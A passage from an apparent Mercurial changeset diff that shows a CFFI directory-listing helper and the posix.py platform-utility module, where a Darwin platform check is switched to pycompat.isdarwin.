64 str_lgt - 1))
64 str_lgt - 1))
65 tp = attrkinds[cur.obj_type]
65 tp = attrkinds[cur.obj_type]
66 if name == "." or name == "..":
66 if name == "." or name == "..":
67 continue
67 continue
68 if skip == name and tp == statmod.S_ISDIR:
68 if skip == name and tp == statmod.S_ISDIR:
69 return []
69 return []
70 if stat:
70 if stat:
71 mtime = cur.mtime.tv_sec
71 mtime = cur.mtime.tv_sec
72 mode = (cur.accessmask & ~lib.S_IFMT)| tp
72 mode = (cur.accessmask & ~lib.S_IFMT)| tp
73 ret.append((name, tp, stat_res(st_mode=mode, st_mtime=mtime,
73 ret.append((name, tp, stat_res(st_mode=mode, st_mtime=mtime,
74 st_size=cur.datalength)))
74 st_size=cur.datalength)))
75 else:
75 else:
76 ret.append((name, tp))
76 ret.append((name, tp))
77 cur = ffi.cast("val_attrs_t*", int(ffi.cast("intptr_t", cur))
77 cur = ffi.cast("val_attrs_t*", int(ffi.cast("intptr_t", cur))
78 + lgt)
78 + lgt)
79 return ret
79 return ret
80
80
81 def listdir(path, stat=False, skip=None):
81 def listdir(path, stat=False, skip=None):
82 req = ffi.new("struct attrlist*")
82 req = ffi.new("struct attrlist*")
83 req.bitmapcount = lib.ATTR_BIT_MAP_COUNT
83 req.bitmapcount = lib.ATTR_BIT_MAP_COUNT
84 req.commonattr = (lib.ATTR_CMN_RETURNED_ATTRS |
84 req.commonattr = (lib.ATTR_CMN_RETURNED_ATTRS |
85 lib.ATTR_CMN_NAME |
85 lib.ATTR_CMN_NAME |
86 lib.ATTR_CMN_OBJTYPE |
86 lib.ATTR_CMN_OBJTYPE |
87 lib.ATTR_CMN_ACCESSMASK |
87 lib.ATTR_CMN_ACCESSMASK |
88 lib.ATTR_CMN_MODTIME)
88 lib.ATTR_CMN_MODTIME)
89 req.fileattr = lib.ATTR_FILE_DATALENGTH
89 req.fileattr = lib.ATTR_FILE_DATALENGTH
90 dfd = lib.open(path, lib.O_RDONLY, 0)
90 dfd = lib.open(path, lib.O_RDONLY, 0)
91 if dfd == -1:
91 if dfd == -1:
92 raise OSError(ffi.errno, os.strerror(ffi.errno))
92 raise OSError(ffi.errno, os.strerror(ffi.errno))
93
93
94 try:
94 try:
95 ret = listdirinternal(dfd, req, stat, skip)
95 ret = listdirinternal(dfd, req, stat, skip)
96 finally:
96 finally:
97 try:
97 try:
98 lib.close(dfd)
98 lib.close(dfd)
99 except BaseException:
99 except BaseException:
100 pass # we ignore all the errors from closing, not
100 pass # we ignore all the errors from closing, not
101 # much we can do about that
101 # much we can do about that
102 return ret
102 return ret
@@ -1,675 +1,675 b''
1 # posix.py - Posix utility function implementations for Mercurial
1 # posix.py - Posix utility function implementations for Mercurial
2 #
2 #
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import errno
10 import errno
11 import fcntl
11 import fcntl
12 import getpass
12 import getpass
13 import grp
13 import grp
14 import os
14 import os
15 import pwd
15 import pwd
16 import re
16 import re
17 import select
17 import select
18 import stat
18 import stat
19 import sys
19 import sys
20 import tempfile
20 import tempfile
21 import unicodedata
21 import unicodedata
22
22
23 from .i18n import _
23 from .i18n import _
24 from . import (
24 from . import (
25 encoding,
25 encoding,
26 error,
26 error,
27 pycompat,
27 pycompat,
28 )
28 )
29
29
30 posixfile = open
30 posixfile = open
31 normpath = os.path.normpath
31 normpath = os.path.normpath
32 samestat = os.path.samestat
32 samestat = os.path.samestat
33 try:
33 try:
34 oslink = os.link
34 oslink = os.link
35 except AttributeError:
35 except AttributeError:
36 # Some platforms build Python without os.link on systems that are
36 # Some platforms build Python without os.link on systems that are
37 # vaguely unix-like but don't have hardlink support. For those
37 # vaguely unix-like but don't have hardlink support. For those
38 # poor souls, just say we tried and that it failed so we fall back
38 # poor souls, just say we tried and that it failed so we fall back
39 # to copies.
39 # to copies.
40 def oslink(src, dst):
40 def oslink(src, dst):
41 raise OSError(errno.EINVAL,
41 raise OSError(errno.EINVAL,
42 'hardlinks not supported: %s to %s' % (src, dst))
42 'hardlinks not supported: %s to %s' % (src, dst))
43 unlink = os.unlink
43 unlink = os.unlink
44 rename = os.rename
44 rename = os.rename
45 removedirs = os.removedirs
45 removedirs = os.removedirs
46 expandglobs = False
46 expandglobs = False
47
47
48 umask = os.umask(0)
48 umask = os.umask(0)
49 os.umask(umask)
49 os.umask(umask)
50
50
51 def split(p):
51 def split(p):
52 '''Same as posixpath.split, but faster
52 '''Same as posixpath.split, but faster
53
53
54 >>> import posixpath
54 >>> import posixpath
55 >>> for f in [b'/absolute/path/to/file',
55 >>> for f in [b'/absolute/path/to/file',
56 ... b'relative/path/to/file',
56 ... b'relative/path/to/file',
57 ... b'file_alone',
57 ... b'file_alone',
58 ... b'path/to/directory/',
58 ... b'path/to/directory/',
59 ... b'/multiple/path//separators',
59 ... b'/multiple/path//separators',
60 ... b'/file_at_root',
60 ... b'/file_at_root',
61 ... b'///multiple_leading_separators_at_root',
61 ... b'///multiple_leading_separators_at_root',
62 ... b'']:
62 ... b'']:
63 ... assert split(f) == posixpath.split(f), f
63 ... assert split(f) == posixpath.split(f), f
64 '''
64 '''
65 ht = p.rsplit('/', 1)
65 ht = p.rsplit('/', 1)
66 if len(ht) == 1:
66 if len(ht) == 1:
67 return '', p
67 return '', p
68 nh = ht[0].rstrip('/')
68 nh = ht[0].rstrip('/')
69 if nh:
69 if nh:
70 return nh, ht[1]
70 return nh, ht[1]
71 return ht[0] + '/', ht[1]
71 return ht[0] + '/', ht[1]
72
72
73 def openhardlinks():
73 def openhardlinks():
74 '''return true if it is safe to hold open file handles to hardlinks'''
74 '''return true if it is safe to hold open file handles to hardlinks'''
75 return True
75 return True
76
76
77 def nlinks(name):
77 def nlinks(name):
78 '''return number of hardlinks for the given file'''
78 '''return number of hardlinks for the given file'''
79 return os.lstat(name).st_nlink
79 return os.lstat(name).st_nlink
80
80
81 def parsepatchoutput(output_line):
81 def parsepatchoutput(output_line):
82 """parses the output produced by patch and returns the filename"""
82 """parses the output produced by patch and returns the filename"""
83 pf = output_line[14:]
83 pf = output_line[14:]
84 if pycompat.sysplatform == 'OpenVMS':
84 if pycompat.sysplatform == 'OpenVMS':
85 if pf[0] == '`':
85 if pf[0] == '`':
86 pf = pf[1:-1] # Remove the quotes
86 pf = pf[1:-1] # Remove the quotes
87 else:
87 else:
88 if pf.startswith("'") and pf.endswith("'") and " " in pf:
88 if pf.startswith("'") and pf.endswith("'") and " " in pf:
89 pf = pf[1:-1] # Remove the quotes
89 pf = pf[1:-1] # Remove the quotes
90 return pf
90 return pf
91
91
92 def sshargs(sshcmd, host, user, port):
92 def sshargs(sshcmd, host, user, port):
93 '''Build argument list for ssh'''
93 '''Build argument list for ssh'''
94 args = user and ("%s@%s" % (user, host)) or host
94 args = user and ("%s@%s" % (user, host)) or host
95 if '-' in args[:1]:
95 if '-' in args[:1]:
96 raise error.Abort(
96 raise error.Abort(
97 _('illegal ssh hostname or username starting with -: %s') % args)
97 _('illegal ssh hostname or username starting with -: %s') % args)
98 args = shellquote(args)
98 args = shellquote(args)
99 if port:
99 if port:
100 args = '-p %s %s' % (shellquote(port), args)
100 args = '-p %s %s' % (shellquote(port), args)
101 return args
101 return args
102
102
103 def isexec(f):
103 def isexec(f):
104 """check whether a file is executable"""
104 """check whether a file is executable"""
105 return (os.lstat(f).st_mode & 0o100 != 0)
105 return (os.lstat(f).st_mode & 0o100 != 0)
106
106
107 def setflags(f, l, x):
107 def setflags(f, l, x):
108 st = os.lstat(f)
108 st = os.lstat(f)
109 s = st.st_mode
109 s = st.st_mode
110 if l:
110 if l:
111 if not stat.S_ISLNK(s):
111 if not stat.S_ISLNK(s):
112 # switch file to link
112 # switch file to link
113 fp = open(f)
113 fp = open(f)
114 data = fp.read()
114 data = fp.read()
115 fp.close()
115 fp.close()
116 unlink(f)
116 unlink(f)
117 try:
117 try:
118 os.symlink(data, f)
118 os.symlink(data, f)
119 except OSError:
119 except OSError:
120 # failed to make a link, rewrite file
120 # failed to make a link, rewrite file
121 fp = open(f, "w")
121 fp = open(f, "w")
122 fp.write(data)
122 fp.write(data)
123 fp.close()
123 fp.close()
124 # no chmod needed at this point
124 # no chmod needed at this point
125 return
125 return
126 if stat.S_ISLNK(s):
126 if stat.S_ISLNK(s):
127 # switch link to file
127 # switch link to file
128 data = os.readlink(f)
128 data = os.readlink(f)
129 unlink(f)
129 unlink(f)
130 fp = open(f, "w")
130 fp = open(f, "w")
131 fp.write(data)
131 fp.write(data)
132 fp.close()
132 fp.close()
133 s = 0o666 & ~umask # avoid restatting for chmod
133 s = 0o666 & ~umask # avoid restatting for chmod
134
134
135 sx = s & 0o100
135 sx = s & 0o100
136 if st.st_nlink > 1 and bool(x) != bool(sx):
136 if st.st_nlink > 1 and bool(x) != bool(sx):
137 # the file is a hardlink, break it
137 # the file is a hardlink, break it
138 with open(f, "rb") as fp:
138 with open(f, "rb") as fp:
139 data = fp.read()
139 data = fp.read()
140 unlink(f)
140 unlink(f)
141 with open(f, "wb") as fp:
141 with open(f, "wb") as fp:
142 fp.write(data)
142 fp.write(data)
143
143
144 if x and not sx:
144 if x and not sx:
145 # Turn on +x for every +r bit when making a file executable
145 # Turn on +x for every +r bit when making a file executable
146 # and obey umask.
146 # and obey umask.
147 os.chmod(f, s | (s & 0o444) >> 2 & ~umask)
147 os.chmod(f, s | (s & 0o444) >> 2 & ~umask)
148 elif not x and sx:
148 elif not x and sx:
149 # Turn off all +x bits
149 # Turn off all +x bits
150 os.chmod(f, s & 0o666)
150 os.chmod(f, s & 0o666)
151
151
152 def copymode(src, dst, mode=None):
152 def copymode(src, dst, mode=None):
153 '''Copy the file mode from the file at path src to dst.
153 '''Copy the file mode from the file at path src to dst.
154 If src doesn't exist, we're using mode instead. If mode is None, we're
154 If src doesn't exist, we're using mode instead. If mode is None, we're
155 using umask.'''
155 using umask.'''
156 try:
156 try:
157 st_mode = os.lstat(src).st_mode & 0o777
157 st_mode = os.lstat(src).st_mode & 0o777
158 except OSError as inst:
158 except OSError as inst:
159 if inst.errno != errno.ENOENT:
159 if inst.errno != errno.ENOENT:
160 raise
160 raise
161 st_mode = mode
161 st_mode = mode
162 if st_mode is None:
162 if st_mode is None:
163 st_mode = ~umask
163 st_mode = ~umask
164 st_mode &= 0o666
164 st_mode &= 0o666
165 os.chmod(dst, st_mode)
165 os.chmod(dst, st_mode)
166
166
167 def checkexec(path):
167 def checkexec(path):
168 """
168 """
169 Check whether the given path is on a filesystem with UNIX-like exec flags
169 Check whether the given path is on a filesystem with UNIX-like exec flags
170
170
171 Requires a directory (like /foo/.hg)
171 Requires a directory (like /foo/.hg)
172 """
172 """
173
173
174 # VFAT on some Linux versions can flip mode but it doesn't persist
174 # VFAT on some Linux versions can flip mode but it doesn't persist
175 # a FS remount. Frequently we can detect it if files are created
175 # a FS remount. Frequently we can detect it if files are created
176 # with exec bit on.
176 # with exec bit on.
177
177
178 try:
178 try:
179 EXECFLAGS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
179 EXECFLAGS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
180 cachedir = os.path.join(path, '.hg', 'cache')
180 cachedir = os.path.join(path, '.hg', 'cache')
181 if os.path.isdir(cachedir):
181 if os.path.isdir(cachedir):
182 checkisexec = os.path.join(cachedir, 'checkisexec')
182 checkisexec = os.path.join(cachedir, 'checkisexec')
183 checknoexec = os.path.join(cachedir, 'checknoexec')
183 checknoexec = os.path.join(cachedir, 'checknoexec')
184
184
185 try:
185 try:
186 m = os.stat(checkisexec).st_mode
186 m = os.stat(checkisexec).st_mode
187 except OSError as e:
187 except OSError as e:
188 if e.errno != errno.ENOENT:
188 if e.errno != errno.ENOENT:
189 raise
189 raise
190 # checkisexec does not exist - fall through ...
190 # checkisexec does not exist - fall through ...
191 else:
191 else:
192 # checkisexec exists, check if it actually is exec
192 # checkisexec exists, check if it actually is exec
193 if m & EXECFLAGS != 0:
193 if m & EXECFLAGS != 0:
194 # ensure checkisexec exists, check it isn't exec
194 # ensure checkisexec exists, check it isn't exec
195 try:
195 try:
196 m = os.stat(checknoexec).st_mode
196 m = os.stat(checknoexec).st_mode
197 except OSError as e:
197 except OSError as e:
198 if e.errno != errno.ENOENT:
198 if e.errno != errno.ENOENT:
199 raise
199 raise
200 open(checknoexec, 'w').close() # might fail
200 open(checknoexec, 'w').close() # might fail
201 m = os.stat(checknoexec).st_mode
201 m = os.stat(checknoexec).st_mode
202 if m & EXECFLAGS == 0:
202 if m & EXECFLAGS == 0:
203 # check-exec is exec and check-no-exec is not exec
203 # check-exec is exec and check-no-exec is not exec
204 return True
204 return True
205 # checknoexec exists but is exec - delete it
205 # checknoexec exists but is exec - delete it
206 unlink(checknoexec)
206 unlink(checknoexec)
207 # checkisexec exists but is not exec - delete it
207 # checkisexec exists but is not exec - delete it
208 unlink(checkisexec)
208 unlink(checkisexec)
209
209
210 # check using one file, leave it as checkisexec
210 # check using one file, leave it as checkisexec
211 checkdir = cachedir
211 checkdir = cachedir
212 else:
212 else:
213 # check directly in path and don't leave checkisexec behind
213 # check directly in path and don't leave checkisexec behind
214 checkdir = path
214 checkdir = path
215 checkisexec = None
215 checkisexec = None
216 fh, fn = tempfile.mkstemp(dir=checkdir, prefix='hg-checkexec-')
216 fh, fn = tempfile.mkstemp(dir=checkdir, prefix='hg-checkexec-')
217 try:
217 try:
218 os.close(fh)
218 os.close(fh)
219 m = os.stat(fn).st_mode
219 m = os.stat(fn).st_mode
220 if m & EXECFLAGS == 0:
220 if m & EXECFLAGS == 0:
221 os.chmod(fn, m & 0o777 | EXECFLAGS)
221 os.chmod(fn, m & 0o777 | EXECFLAGS)
222 if os.stat(fn).st_mode & EXECFLAGS != 0:
222 if os.stat(fn).st_mode & EXECFLAGS != 0:
223 if checkisexec is not None:
223 if checkisexec is not None:
224 os.rename(fn, checkisexec)
224 os.rename(fn, checkisexec)
225 fn = None
225 fn = None
226 return True
226 return True
227 finally:
227 finally:
228 if fn is not None:
228 if fn is not None:
229 unlink(fn)
229 unlink(fn)
230 except (IOError, OSError):
230 except (IOError, OSError):
231 # we don't care, the user probably won't be able to commit anyway
231 # we don't care, the user probably won't be able to commit anyway
232 return False
232 return False
233
233
234 def checklink(path):
234 def checklink(path):
235 """check whether the given path is on a symlink-capable filesystem"""
235 """check whether the given path is on a symlink-capable filesystem"""
236 # mktemp is not racy because symlink creation will fail if the
236 # mktemp is not racy because symlink creation will fail if the
237 # file already exists
237 # file already exists
238 while True:
238 while True:
239 cachedir = os.path.join(path, '.hg', 'cache')
239 cachedir = os.path.join(path, '.hg', 'cache')
240 checklink = os.path.join(cachedir, 'checklink')
240 checklink = os.path.join(cachedir, 'checklink')
241 # try fast path, read only
241 # try fast path, read only
242 if os.path.islink(checklink):
242 if os.path.islink(checklink):
243 return True
243 return True
244 if os.path.isdir(cachedir):
244 if os.path.isdir(cachedir):
245 checkdir = cachedir
245 checkdir = cachedir
246 else:
246 else:
247 checkdir = path
247 checkdir = path
248 cachedir = None
248 cachedir = None
249 fscheckdir = pycompat.fsdecode(checkdir)
249 fscheckdir = pycompat.fsdecode(checkdir)
250 name = tempfile.mktemp(dir=fscheckdir,
250 name = tempfile.mktemp(dir=fscheckdir,
251 prefix=r'checklink-')
251 prefix=r'checklink-')
252 name = pycompat.fsencode(name)
252 name = pycompat.fsencode(name)
253 try:
253 try:
254 fd = None
254 fd = None
255 if cachedir is None:
255 if cachedir is None:
256 fd = tempfile.NamedTemporaryFile(dir=fscheckdir,
256 fd = tempfile.NamedTemporaryFile(dir=fscheckdir,
257 prefix=r'hg-checklink-')
257 prefix=r'hg-checklink-')
258 target = pycompat.fsencode(os.path.basename(fd.name))
258 target = pycompat.fsencode(os.path.basename(fd.name))
259 else:
259 else:
260 # create a fixed file to link to; doesn't matter if it
260 # create a fixed file to link to; doesn't matter if it
261 # already exists.
261 # already exists.
262 target = 'checklink-target'
262 target = 'checklink-target'
263 try:
263 try:
264 open(os.path.join(cachedir, target), 'w').close()
264 open(os.path.join(cachedir, target), 'w').close()
265 except IOError as inst:
265 except IOError as inst:
266 if inst[0] == errno.EACCES:
266 if inst[0] == errno.EACCES:
267 # If we can't write to cachedir, just pretend
267 # If we can't write to cachedir, just pretend
268 # that the fs is readonly and by association
268 # that the fs is readonly and by association
269 # that the fs won't support symlinks. This
269 # that the fs won't support symlinks. This
270 # seems like the least dangerous way to avoid
270 # seems like the least dangerous way to avoid
271 # data loss.
271 # data loss.
272 return False
272 return False
273 raise
273 raise
274 try:
274 try:
275 os.symlink(target, name)
275 os.symlink(target, name)
276 if cachedir is None:
276 if cachedir is None:
277 unlink(name)
277 unlink(name)
278 else:
278 else:
279 try:
279 try:
280 os.rename(name, checklink)
280 os.rename(name, checklink)
281 except OSError:
281 except OSError:
282 unlink(name)
282 unlink(name)
283 return True
283 return True
284 except OSError as inst:
284 except OSError as inst:
285 # link creation might race, try again
285 # link creation might race, try again
286 if inst[0] == errno.EEXIST:
286 if inst[0] == errno.EEXIST:
287 continue
287 continue
288 raise
288 raise
289 finally:
289 finally:
290 if fd is not None:
290 if fd is not None:
291 fd.close()
291 fd.close()
292 except AttributeError:
292 except AttributeError:
293 return False
293 return False
294 except OSError as inst:
294 except OSError as inst:
295 # sshfs might report failure while successfully creating the link
295 # sshfs might report failure while successfully creating the link
296 if inst[0] == errno.EIO and os.path.exists(name):
296 if inst[0] == errno.EIO and os.path.exists(name):
297 unlink(name)
297 unlink(name)
298 return False
298 return False
299
299
300 def checkosfilename(path):
300 def checkosfilename(path):
301 '''Check that the base-relative path is a valid filename on this platform.
301 '''Check that the base-relative path is a valid filename on this platform.
302 Returns None if the path is ok, or a UI string describing the problem.'''
302 Returns None if the path is ok, or a UI string describing the problem.'''
303 return None # on posix platforms, every path is ok
303 return None # on posix platforms, every path is ok
304
304
305 def setbinary(fd):
305 def setbinary(fd):
306 pass
306 pass
307
307
308 def pconvert(path):
308 def pconvert(path):
309 return path
309 return path
310
310
311 def localpath(path):
311 def localpath(path):
312 return path
312 return path
313
313
314 def samefile(fpath1, fpath2):
314 def samefile(fpath1, fpath2):
315 """Returns whether path1 and path2 refer to the same file. This is only
315 """Returns whether path1 and path2 refer to the same file. This is only
316 guaranteed to work for files, not directories."""
316 guaranteed to work for files, not directories."""
317 return os.path.samefile(fpath1, fpath2)
317 return os.path.samefile(fpath1, fpath2)
318
318
319 def samedevice(fpath1, fpath2):
319 def samedevice(fpath1, fpath2):
320 """Returns whether fpath1 and fpath2 are on the same device. This is only
320 """Returns whether fpath1 and fpath2 are on the same device. This is only
321 guaranteed to work for files, not directories."""
321 guaranteed to work for files, not directories."""
322 st1 = os.lstat(fpath1)
322 st1 = os.lstat(fpath1)
323 st2 = os.lstat(fpath2)
323 st2 = os.lstat(fpath2)
324 return st1.st_dev == st2.st_dev
324 return st1.st_dev == st2.st_dev
325
325
326 # os.path.normcase is a no-op, which doesn't help us on non-native filesystems
326 # os.path.normcase is a no-op, which doesn't help us on non-native filesystems
327 def normcase(path):
327 def normcase(path):
328 return path.lower()
328 return path.lower()
329
329
330 # what normcase does to ASCII strings
330 # what normcase does to ASCII strings
331 normcasespec = encoding.normcasespecs.lower
331 normcasespec = encoding.normcasespecs.lower
332 # fallback normcase function for non-ASCII strings
332 # fallback normcase function for non-ASCII strings
333 normcasefallback = normcase
333 normcasefallback = normcase
334
334
335 if pycompat.sysplatform == 'darwin':
335 if pycompat.isdarwin:
336
336
337 def normcase(path):
337 def normcase(path):
338 '''
338 '''
339 Normalize a filename for OS X-compatible comparison:
339 Normalize a filename for OS X-compatible comparison:
340 - escape-encode invalid characters
340 - escape-encode invalid characters
341 - decompose to NFD
341 - decompose to NFD
342 - lowercase
342 - lowercase
343 - omit ignored characters [200c-200f, 202a-202e, 206a-206f,feff]
343 - omit ignored characters [200c-200f, 202a-202e, 206a-206f,feff]
344
344
345 >>> normcase(b'UPPER')
345 >>> normcase(b'UPPER')
346 'upper'
346 'upper'
347 >>> normcase(b'Caf\\xc3\\xa9')
347 >>> normcase(b'Caf\\xc3\\xa9')
348 'cafe\\xcc\\x81'
348 'cafe\\xcc\\x81'
349 >>> normcase(b'\\xc3\\x89')
349 >>> normcase(b'\\xc3\\x89')
350 'e\\xcc\\x81'
350 'e\\xcc\\x81'
351 >>> normcase(b'\\xb8\\xca\\xc3\\xca\\xbe\\xc8.JPG') # issue3918
351 >>> normcase(b'\\xb8\\xca\\xc3\\xca\\xbe\\xc8.JPG') # issue3918
352 '%b8%ca%c3\\xca\\xbe%c8.jpg'
352 '%b8%ca%c3\\xca\\xbe%c8.jpg'
353 '''
353 '''
354
354
355 try:
355 try:
356 return encoding.asciilower(path) # exception for non-ASCII
356 return encoding.asciilower(path) # exception for non-ASCII
357 except UnicodeDecodeError:
357 except UnicodeDecodeError:
358 return normcasefallback(path)
358 return normcasefallback(path)
359
359
360 normcasespec = encoding.normcasespecs.lower
360 normcasespec = encoding.normcasespecs.lower
361
361
362 def normcasefallback(path):
362 def normcasefallback(path):
363 try:
363 try:
364 u = path.decode('utf-8')
364 u = path.decode('utf-8')
365 except UnicodeDecodeError:
365 except UnicodeDecodeError:
366 # OS X percent-encodes any bytes that aren't valid utf-8
366 # OS X percent-encodes any bytes that aren't valid utf-8
367 s = ''
367 s = ''
368 pos = 0
368 pos = 0
369 l = len(path)
369 l = len(path)
370 while pos < l:
370 while pos < l:
371 try:
371 try:
372 c = encoding.getutf8char(path, pos)
372 c = encoding.getutf8char(path, pos)
373 pos += len(c)
373 pos += len(c)
374 except ValueError:
374 except ValueError:
375 c = '%%%02X' % ord(path[pos:pos + 1])
375 c = '%%%02X' % ord(path[pos:pos + 1])
376 pos += 1
376 pos += 1
377 s += c
377 s += c
378
378
379 u = s.decode('utf-8')
379 u = s.decode('utf-8')
380
380
381 # Decompose then lowercase (HFS+ technote specifies lower)
381 # Decompose then lowercase (HFS+ technote specifies lower)
382 enc = unicodedata.normalize(r'NFD', u).lower().encode('utf-8')
382 enc = unicodedata.normalize(r'NFD', u).lower().encode('utf-8')
383 # drop HFS+ ignored characters
383 # drop HFS+ ignored characters
384 return encoding.hfsignoreclean(enc)
384 return encoding.hfsignoreclean(enc)
385
385
386 if pycompat.sysplatform == 'cygwin':
386 if pycompat.sysplatform == 'cygwin':
387 # workaround for cygwin, in which mount point part of path is
387 # workaround for cygwin, in which mount point part of path is
388 # treated as case sensitive, even though underlying NTFS is case
388 # treated as case sensitive, even though underlying NTFS is case
389 # insensitive.
389 # insensitive.
390
390
391 # default mount points
391 # default mount points
392 cygwinmountpoints = sorted([
392 cygwinmountpoints = sorted([
393 "/usr/bin",
393 "/usr/bin",
394 "/usr/lib",
394 "/usr/lib",
395 "/cygdrive",
395 "/cygdrive",
396 ], reverse=True)
396 ], reverse=True)
397
397
398 # use upper-ing as normcase as same as NTFS workaround
398 # use upper-ing as normcase as same as NTFS workaround
399 def normcase(path):
399 def normcase(path):
400 pathlen = len(path)
400 pathlen = len(path)
401 if (pathlen == 0) or (path[0] != pycompat.ossep):
401 if (pathlen == 0) or (path[0] != pycompat.ossep):
402 # treat as relative
402 # treat as relative
403 return encoding.upper(path)
403 return encoding.upper(path)
404
404
405 # to preserve case of mountpoint part
405 # to preserve case of mountpoint part
406 for mp in cygwinmountpoints:
406 for mp in cygwinmountpoints:
407 if not path.startswith(mp):
407 if not path.startswith(mp):
408 continue
408 continue
409
409
410 mplen = len(mp)
410 mplen = len(mp)
411 if mplen == pathlen: # mount point itself
411 if mplen == pathlen: # mount point itself
412 return mp
412 return mp
413 if path[mplen] == pycompat.ossep:
413 if path[mplen] == pycompat.ossep:
414 return mp + encoding.upper(path[mplen:])
414 return mp + encoding.upper(path[mplen:])
415
415
416 return encoding.upper(path)
416 return encoding.upper(path)
417
417
418 normcasespec = encoding.normcasespecs.other
418 normcasespec = encoding.normcasespecs.other
419 normcasefallback = normcase
419 normcasefallback = normcase
420
420
421 # Cygwin translates native ACLs to POSIX permissions,
421 # Cygwin translates native ACLs to POSIX permissions,
422 # but these translations are not supported by native
422 # but these translations are not supported by native
423 # tools, so the exec bit tends to be set erroneously.
423 # tools, so the exec bit tends to be set erroneously.
424 # Therefore, disable executable bit access on Cygwin.
424 # Therefore, disable executable bit access on Cygwin.
425 def checkexec(path):
425 def checkexec(path):
426 return False
426 return False
427
427
428 # Similarly, Cygwin's symlink emulation is likely to create
428 # Similarly, Cygwin's symlink emulation is likely to create
429 # problems when Mercurial is used from both Cygwin and native
429 # problems when Mercurial is used from both Cygwin and native
430 # Windows, with other native tools, or on shared volumes
430 # Windows, with other native tools, or on shared volumes
431 def checklink(path):
431 def checklink(path):
432 return False
432 return False
433
433
434 _needsshellquote = None
434 _needsshellquote = None
435 def shellquote(s):
435 def shellquote(s):
436 if pycompat.sysplatform == 'OpenVMS':
436 if pycompat.sysplatform == 'OpenVMS':
437 return '"%s"' % s
437 return '"%s"' % s
438 global _needsshellquote
438 global _needsshellquote
439 if _needsshellquote is None:
439 if _needsshellquote is None:
440 _needsshellquote = re.compile(br'[^a-zA-Z0-9._/+-]').search
440 _needsshellquote = re.compile(br'[^a-zA-Z0-9._/+-]').search
441 if s and not _needsshellquote(s):
441 if s and not _needsshellquote(s):
442 # "s" shouldn't have to be quoted
442 # "s" shouldn't have to be quoted
443 return s
443 return s
444 else:
444 else:
445 return "'%s'" % s.replace("'", "'\\''")
445 return "'%s'" % s.replace("'", "'\\''")
446
446
447 def quotecommand(cmd):
447 def quotecommand(cmd):
448 return cmd
448 return cmd
449
449
450 def popen(command, mode='r'):
450 def popen(command, mode='r'):
451 return os.popen(command, mode)
451 return os.popen(command, mode)
452
452
453 def testpid(pid):
453 def testpid(pid):
454 '''return False if pid dead, True if running or not sure'''
454 '''return False if pid dead, True if running or not sure'''
455 if pycompat.sysplatform == 'OpenVMS':
455 if pycompat.sysplatform == 'OpenVMS':
456 return True
456 return True
457 try:
457 try:
458 os.kill(pid, 0)
458 os.kill(pid, 0)
459 return True
459 return True
460 except OSError as inst:
460 except OSError as inst:
461 return inst.errno != errno.ESRCH
461 return inst.errno != errno.ESRCH
462
462
463 def explainexit(code):
463 def explainexit(code):
464 """return a 2-tuple (desc, code) describing a subprocess status
464 """return a 2-tuple (desc, code) describing a subprocess status
465 (codes from kill are negative - not os.system/wait encoding)"""
465 (codes from kill are negative - not os.system/wait encoding)"""
466 if code >= 0:
466 if code >= 0:
467 return _("exited with status %d") % code, code
467 return _("exited with status %d") % code, code
468 return _("killed by signal %d") % -code, -code
468 return _("killed by signal %d") % -code, -code
469
469
470 def isowner(st):
470 def isowner(st):
471 """Return True if the stat object st is from the current user."""
471 """Return True if the stat object st is from the current user."""
472 return st.st_uid == os.getuid()
472 return st.st_uid == os.getuid()
473
473
474 def findexe(command):
474 def findexe(command):
475 '''Find executable for command searching like which does.
475 '''Find executable for command searching like which does.
476 If command is a basename then PATH is searched for command.
476 If command is a basename then PATH is searched for command.
477 PATH isn't searched if command is an absolute or relative path.
477 PATH isn't searched if command is an absolute or relative path.
478 If command isn't found None is returned.'''
478 If command isn't found None is returned.'''
479 if pycompat.sysplatform == 'OpenVMS':
479 if pycompat.sysplatform == 'OpenVMS':
480 return command
480 return command
481
481
482 def findexisting(executable):
482 def findexisting(executable):
483 'Will return executable if existing file'
483 'Will return executable if existing file'
484 if os.path.isfile(executable) and os.access(executable, os.X_OK):
484 if os.path.isfile(executable) and os.access(executable, os.X_OK):
485 return executable
485 return executable
486 return None
486 return None
487
487
488 if pycompat.ossep in command:
488 if pycompat.ossep in command:
489 return findexisting(command)
489 return findexisting(command)
490
490
491 if pycompat.sysplatform == 'plan9':
491 if pycompat.sysplatform == 'plan9':
492 return findexisting(os.path.join('/bin', command))
492 return findexisting(os.path.join('/bin', command))
493
493
494 for path in encoding.environ.get('PATH', '').split(pycompat.ospathsep):
494 for path in encoding.environ.get('PATH', '').split(pycompat.ospathsep):
495 executable = findexisting(os.path.join(path, command))
495 executable = findexisting(os.path.join(path, command))
496 if executable is not None:
496 if executable is not None:
497 return executable
497 return executable
498 return None
498 return None
499
499
500 def setsignalhandler():
500 def setsignalhandler():
501 pass
501 pass
502
502
503 _wantedkinds = {stat.S_IFREG, stat.S_IFLNK}
503 _wantedkinds = {stat.S_IFREG, stat.S_IFLNK}
504
504
505 def statfiles(files):
505 def statfiles(files):
506 '''Stat each file in files. Yield each stat, or None if a file does not
506 '''Stat each file in files. Yield each stat, or None if a file does not
507 exist or has a type we don't care about.'''
507 exist or has a type we don't care about.'''
508 lstat = os.lstat
508 lstat = os.lstat
509 getkind = stat.S_IFMT
509 getkind = stat.S_IFMT
510 for nf in files:
510 for nf in files:
511 try:
511 try:
512 st = lstat(nf)
512 st = lstat(nf)
513 if getkind(st.st_mode) not in _wantedkinds:
513 if getkind(st.st_mode) not in _wantedkinds:
514 st = None
514 st = None
515 except OSError as err:
515 except OSError as err:
516 if err.errno not in (errno.ENOENT, errno.ENOTDIR):
516 if err.errno not in (errno.ENOENT, errno.ENOTDIR):
517 raise
517 raise
518 st = None
518 st = None
519 yield st
519 yield st
520
520
521 def getuser():
521 def getuser():
522 '''return name of current user'''
522 '''return name of current user'''
523 return pycompat.fsencode(getpass.getuser())
523 return pycompat.fsencode(getpass.getuser())
524
524
525 def username(uid=None):
525 def username(uid=None):
526 """Return the name of the user with the given uid.
526 """Return the name of the user with the given uid.
527
527
